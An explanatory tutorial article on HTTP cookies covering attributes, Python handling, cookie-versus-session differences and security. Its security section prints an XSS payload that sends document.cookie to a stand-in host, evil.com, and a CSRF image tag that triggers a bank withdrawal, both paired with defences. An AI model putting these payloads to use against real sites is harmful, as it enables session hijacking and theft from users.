Comprehensive Guide to HTTP Cookies: Principles, Attributes, Python Usage, and Security
This article provides a thorough overview of HTTP cookies, covering their origin, definition, working principles, attributes, Python manipulation, session comparison, common interview questions, and associated security concerns, all illustrated with examples and code snippets.
In the previous tutorial on a Youku Danmu crawler we briefly introduced the concept of cookies; this article offers a complete understanding of HTTP cookies (small biscuits) and related knowledge.
1. Origin
HTTP is stateless: on its own, the server cannot tell whether two requests come from the same browser, which makes interactive web applications hard to build. To record user actions, developers first used hidden form fields, but this was cumbersome. In 1994, Netscape employee Lou Montulli introduced cookies so that a site could remember the contents of a shopping cart, and today all major browsers support them.
2. What is a Cookie
A cookie is a small piece of information that the server sends to the client and that the client stores locally (traditionally as a small text file). The client includes it in subsequent requests to the same site, subject to the cookie's Domain and Path, allowing the server to track client state.
Cookies are mainly used for:
Session state management (e.g., login status, shopping cart, game scores).
Personalized settings (e.g., user preferences, themes).
Browser behavior tracking (e.g., analytics).
3. Cookie Mechanism
Take login as an example: the server validates the credentials and returns a Set-Cookie header. The browser stores the cookie and sends it back in the Cookie header on subsequent requests.
HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Thu, 15 Aug 2019 21:47:38 GMT; Path=/; Domain=.example.org; HttpOnly
[response body]
Later request:
GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg
The server reads the cookie to identify the logged-in user. Because cookies are stored client-side, they can be modified, which poses security risks. Note that cookies are always transmitted via HTTP headers.
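The exchange above can be mimicked with Python's standard library. The sketch below parses a Set-Cookie value with http.cookies.SimpleCookie and builds the Cookie header a browser would send back. The header value and the example.org domain are illustrative assumptions, not output from a real server.

```python
from http.cookies import SimpleCookie

# Illustrative header value (the text that follows "Set-Cookie: ").
set_cookie_value = (
    "user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; "
    "Expires=Thu, 15 Aug 2019 21:47:38 GMT; "
    "Path=/; Domain=.example.org; HttpOnly"
)

jar = SimpleCookie()
jar.load(set_cookie_value)  # parse the name, value and attributes

morsel = jar["user_cookie"]
print("value:   ", morsel.value)
print("path:    ", morsel["path"])
print("domain:  ", morsel["domain"])
print("httponly:", bool(morsel["httponly"]))

# Only name=value pairs travel back to the server; the attributes
# (Expires, Path, Domain, HttpOnly) stay with the client.
cookie_header = "; ".join(f"{name}={m.value}" for name, m in jar.items())
print("Cookie:", cookie_header)
```

A real browser also checks the domain, path, and expiry before sending the cookie; this sketch skips those checks.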
4. Cookie Attributes
A cookie contains several attributes: Name, Value, Domain, Path, Expires/Max‑Age, Size, HttpOnly, Secure. Each attribute’s purpose is explained below.
1. Name & Value
The Name identifies the cookie; the server uses it to retrieve the corresponding Value, which often serves as a key for server‑side data.
2. Domain & Path
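Domain specifies which hostnames receive the cookie: a cookie set for .baidu.com is sent to baidu.com and all of its subdomains, whereas one set for .tieba.baidu.com is sent only to tieba.baidu.com and its subdomains. Path restricts the cookie to URLs at or below a given path (e.g., /test).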
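To make the matching rules concrete, here is a simplified sketch of how a client might decide whether a cookie applies to a request. The function names are hypothetical, and the logic deliberately ignores details that real browsers handle, such as IP addresses and public-suffix restrictions.

```python
def domain_matches(cookie_domain: str, request_host: str) -> bool:
    """Simplified domain match: the exact host or any subdomain of it."""
    cookie_domain = cookie_domain.lstrip(".").lower()
    request_host = request_host.lower()
    return request_host == cookie_domain or request_host.endswith("." + cookie_domain)


def path_matches(cookie_path: str, request_path: str) -> bool:
    """Simplified path match: the request path equals or lies under cookie_path."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        # "/test" must match "/test/page" but not "/testing".
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False


print(domain_matches(".baidu.com", "tieba.baidu.com"))      # subdomain of baidu.com
print(domain_matches(".tieba.baidu.com", "www.baidu.com"))  # different subdomain
print(path_matches("/test", "/test/page"))
print(path_matches("/test", "/testing"))
```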
3. Expires/Max‑Age
These define the cookie's lifetime: Expires gives an absolute expiry date, and Max-Age gives a lifetime in seconds. If both are omitted, the cookie is a session cookie and is discarded when the browser is closed.
4. Size
Size is not set by the server; browser developer tools report it as the total number of characters in the Name and Value (e.g., id=666 → size 5).
5. HttpOnly
When set, the cookie is still sent in HTTP headers but cannot be read via JavaScript (document.cookie), which helps limit cookie theft through XSS attacks.
6. Secure
If set, the cookie is transmitted only over HTTPS, preventing exposure over insecure connections.
5. Manipulating Cookies with Python
5.1 Generating Cookies
After validating a username and password, a server can set a cookie in the response header. The browser then stores it automatically.
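As a minimal sketch of this step, the standard library's http.cookies module can build the value of a Set-Cookie header. The function name build_login_cookie, the one-hour lifetime, and the token value are assumptions for illustration; credential validation is assumed to have happened already.

```python
from http.cookies import SimpleCookie


def build_login_cookie(session_token: str) -> str:
    """Return the text that follows 'Set-Cookie: ' for a login cookie."""
    cookie = SimpleCookie()
    cookie["user_cookie"] = session_token
    cookie["user_cookie"]["path"] = "/"
    cookie["user_cookie"]["max-age"] = 3600   # assumed lifetime: one hour
    cookie["user_cookie"]["httponly"] = True  # hide from document.cookie
    cookie["user_cookie"]["secure"] = True    # send over HTTPS only
    return cookie["user_cookie"].OutputString()


# Hypothetical token; a real server would generate an unpredictable one.
header_value = build_login_cookie("Rg3vHJZnehYLjVg7qi3bZjzg")
print("Set-Cookie:", header_value)
```

Web frameworks usually wrap this in a helper on the response object, but the header they emit has the same shape.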
5.2 Retrieving Cookies
Using the requests library, r.cookies holds the cookies set by the response r, and r.cookies.get_dict() provides them as a dictionary.
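The same idea can be tried without a third-party install or network access. The sketch below swaps requests for the standard library's http.cookiejar and urllib, and starts a throwaway local server (an assumption made purely for the demo) that sets one cookie. The resulting dictionary has the same shape that r.cookies.get_dict() gives in requests.

```python
import threading
import urllib.request
from http.cookiejar import CookieJar
from http.server import BaseHTTPRequestHandler, HTTPServer


class SetCookieHandler(BaseHTTPRequestHandler):
    """Throwaway local server that sets one cookie on every response."""

    def do_GET(self):
        self.send_response(200)
        self.send_header("Set-Cookie", "user_cookie=abc123; Path=/")
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, *args):  # keep the demo output quiet
        pass


server = HTTPServer(("127.0.0.1", 0), SetCookieHandler)  # port 0: any free port
threading.Thread(target=server.serve_forever, daemon=True).start()

jar = CookieJar()
opener = urllib.request.build_opener(
    urllib.request.ProxyHandler({}),          # bypass any configured proxy
    urllib.request.HTTPCookieProcessor(jar),  # store cookies from responses
)
opener.open(f"http://127.0.0.1:{server.server_port}/").read()
server.shutdown()
server.server_close()

# Flatten the jar into a plain name -> value dictionary.
cookies = {c.name: c.value for c in jar}
print(cookies)
```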
5.3 Setting Cookies for Crawling
When scraping a site that requires login, copy the browser's cookie string into the Cookie request header so the server treats the crawler as the logged-in user.
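A minimal sketch of this approach, using only the standard library: the cookie string and URL below are hypothetical placeholders, and the request is built but not sent so the example runs offline. The helper parse_cookie_string is an illustrative name, not part of any library.

```python
import urllib.request


def parse_cookie_string(cookie_string: str) -> dict:
    """Split a 'name=value; name2=value2' string copied from the browser."""
    cookies = {}
    for pair in cookie_string.split(";"):
        name, sep, value = pair.strip().partition("=")
        if sep:  # skip empty or malformed fragments
            cookies[name] = value
    return cookies


# Hypothetical cookie string copied from the browser's developer tools.
browser_cookie = "user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; theme=dark"

request = urllib.request.Request(
    "http://www.example.org/sample_page.html",  # placeholder URL
    headers={"Cookie": browser_cookie, "User-Agent": "Mozilla/5.0"},
)
print(request.get_header("Cookie"))
print(parse_cookie_string(browser_cookie))
# urllib.request.urlopen(request) would send it; omitted to stay offline.
```

With requests, the parsed dictionary can be passed through the cookies parameter instead, e.g. requests.get(url, cookies=parse_cookie_string(browser_cookie)).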
6. Session
6.1 Origin
Because cookies are client‑side, visible, and limited in size, sessions were introduced to store user data securely on the server while using a cookie only to hold the session identifier.
6.2 What is a Session
A session is a server‑side object linked to a client via a session ID stored in a cookie. The session persists until the user logs out or the session expires.
6.3 Session Workflow
The first request creates a session and returns a session ID cookie.
Subsequent requests include the session ID cookie, allowing the server to associate requests with the stored session data.
Sessions can be implemented via cookies or URL rewriting; the cookie‑based approach is illustrated in the diagram.
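The cookie-based workflow can be sketched with an in-memory store. Everything here is an illustrative assumption: the function names, the 30-minute lifetime, and the use of a plain dictionary (a real deployment would typically use a shared store such as a database or cache).

```python
import secrets
import time

SESSION_TTL_SECONDS = 1800  # assumed 30-minute lifetime
_sessions = {}              # session_id -> (expires_at, data)


def create_session(data: dict) -> str:
    """First request: store data server-side and return a new session ID."""
    session_id = secrets.token_urlsafe(32)  # unpredictable identifier
    _sessions[session_id] = (time.time() + SESSION_TTL_SECONDS, data)
    return session_id


def load_session(session_id: str):
    """Later requests: look up the data for the ID sent in the cookie."""
    entry = _sessions.get(session_id)
    if entry is None:
        return None
    expires_at, data = entry
    if time.time() > expires_at:  # expired: forget it
        del _sessions[session_id]
        return None
    return data


def destroy_session(session_id: str) -> None:
    """Logout: drop the server-side data."""
    _sessions.pop(session_id, None)


sid = create_session({"user": "bob"})  # value to place in the session cookie
print(load_session(sid))               # data found while the session is live
destroy_session(sid)
print(load_session(sid))               # nothing left after logout
```

Only the session ID travels in the cookie; the user data never leaves the server.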
7. Interview Scenarios
7.1 Cookie vs. Session
Both let the server keep state across requests from the same client.
Cookies reside on the client, are easy to forge, and are less secure.
Sessions reside on the server, consuming server resources but offering better security.
Session implementation methods: Cookie and URL rewriting.
7.2 Security Issues Caused by Cookies
Session hijacking and XSS: Attackers can steal cookies via malicious scripts, e.g.,
(new Image()).src = "http://evil.com/steal?c=" + document.cookie;
HttpOnly cookies mitigate this.
Cross‑Site Request Forgery (CSRF): An attacker can embed an image tag that triggers a state‑changing request using the victim’s cookie, e.g.,
<img src="http://bank.example.com/withdraw?account=bob&amount=1000000">
Defenses include hidden tokens, confirmation steps, and short cookie lifetimes.
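The hidden-token defense can be sketched as follows. This is one possible scheme under stated assumptions, not a definitive implementation: the token is an HMAC of the session ID under a server-side secret, and the names SECRET_KEY, make_csrf_token, and is_valid_csrf_token are hypothetical.

```python
import hashlib
import hmac
import secrets

SECRET_KEY = secrets.token_bytes(32)  # assumed per-application secret


def make_csrf_token(session_id: str) -> str:
    """Derive the token to embed in a hidden form field for this session."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def is_valid_csrf_token(session_id: str, submitted_token: str) -> bool:
    """Check the token submitted with a state-changing request."""
    expected = make_csrf_token(session_id)
    # Constant-time comparison avoids leaking how many characters matched.
    return hmac.compare_digest(expected.encode(), submitted_token.encode())


token = make_csrf_token("session-of-bob")
print(is_valid_csrf_token("session-of-bob", token))  # genuine form submission
print(is_valid_csrf_token("session-of-bob", ""))     # forged request, no token
```

A forged image request still carries the victim's cookie automatically, but the attacker's page cannot read the hidden token, so the server can reject the request.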
8. Summary
This article covered the fundamentals of HTTP cookies, their attributes, how to manipulate them with Python, the relationship between cookies and sessions, and common security concerns, providing a solid foundation for future web‑crawling and web‑development work.
Full-Stack Internet Architecture
Introducing full-stack Internet architecture technologies centered on Java
